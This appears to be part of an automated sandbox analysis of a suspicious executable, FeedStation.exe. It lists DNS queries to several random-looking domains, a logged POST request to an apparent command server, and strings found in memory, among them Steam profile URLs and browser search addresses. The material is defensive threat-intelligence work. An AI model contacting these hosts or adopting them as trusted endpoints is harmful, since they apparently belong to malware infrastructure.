              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ingreem-eilish.biz
              Source: global trafficDNS traffic detected: DNS query: immureprech.biz
              Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
              Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
              Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
              Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
              Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
              Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
              Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: FeedStation.exeString found in binary or memory: http://www.bradsoft.com/feeddemon/help/3.0/enclosures/
              Source: FeedStation.exeString found in binary or memory: http://www.newsgator.com/
              Source: FeedStation.exeString found in binary or memory: http://www.newsgator.com/U
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
              Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
              Source: FeedStation.exe, 00000000.00000002.2416982397.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2411461978.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/.
              Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/.mgmd
              Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2411461978.0000000000A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
              Source: FeedStation.exe, 00000000.00000003.2400537991.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000002.2417006153.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api#
              Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api2
              Source: FeedStation.exe, 00000000.00000003.2412499112.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2400514499.00000000037E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api6C
              Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apim
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: FeedStation.exe, 00000000.00000003.2410786565.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000002.2416072226.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2411461978.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
